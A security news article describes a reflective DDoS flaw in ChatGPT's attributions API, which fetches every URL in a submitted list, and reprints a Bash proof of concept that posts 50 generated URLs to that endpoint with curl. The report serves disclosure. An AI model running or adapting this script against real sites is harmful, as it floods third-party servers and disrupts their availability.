Security researchers have uncovered a severe vulnerability in OpenAI’s ChatGPT API, allowing attackers to exploit its architecture for launching Reflective Distributed Denial of Service (DDoS) attacks.
This loophole, characterized by a high severity CVSS score of 8.6, raises significant concerns regarding the scalability and security of AI services deployed on cloud platforms, specifically Microsoft’s Azure.
Overview of the Vulnerability
The vulnerability arises from the ChatGPT API’s inadequacies in processing HTTP POST requests sent to https://chatgpt.com/backend-api/attributions.
Attackers can craft a single request containing a multitude of URLs—potentially thousands—without the system enforcing any limits on input validation.
As a result, the API unwittingly sends simultaneous requests to a targeted website from multiple IP addresses associated with Microsoft Azure, overwhelming the victim’s server.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
When a well-formed HTTP POST request reaches the ChatGPT server, it triggers separate outbound requests for each URL provided in the payload.
As OpenAI’s API fails to check for duplicate URLs or restrict the number of connections, a crafted attack can result in a massive influx of requests flooding the target web server.
This behavior highlights significant lapses in OpenAI’s quality control and software engineering processes, necessitating immediate remedial action to prevent potential abuse.
The flaw poses a considerable threat to targeted websites, as they can easily become overwhelmed by the barrage of HTTP requests.
The implications for availability are severe, potentially leading to prolonged service outages.
Furthermore, while the vulnerability does not compromise data confidentiality or integrity, the sheer volume of traffic could severely disrupt normal operations, leading to financial and reputational damage for affected organizations.
Proof of Concept
Security experts have demonstrated the viability of the exploit with a simple proof of concept. The following Bash script illustrates how an attacker might initiate 50 HTTP requests directed at an unsuspecting target:
#!/bin/bash
echo {1..50} | tr ' ' '\n' | (
while read -r i;
do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt";
done
) | jq -R -s -j -c '{ "urls": split("\n")[:-1] }' \
| curl -v --http1.1 \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, like Gecko) Chrome/133.0.0.1 Safari/535.32' \
-H "content-type: application/json" \
-H 'origin: https://www.chatgpt.com' \
--data-binary @- -X POST 'https://chatgpt.com/backend-api/attributions'Log files from the targeted website reveal alarming patterns, with multiple connection attempts occurring within seconds. This indicates that a successful attack can result in a significant degradation of service.
According to the GitHub report, the discovery of the ChatGPT crawler vulnerability underscores the pressing need for enhanced quality control measures and stringent security protocols in the development of AI systems.
Without immediate remediation from OpenAI, this vulnerability may be exploited, leading to potentially catastrophic consequences for web services worldwide.
Stakeholders in the tech community must remain vigilant and proactive in addressing such high-severity vulnerabilities to safeguard the integrity of their digital infrastructures.
Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar
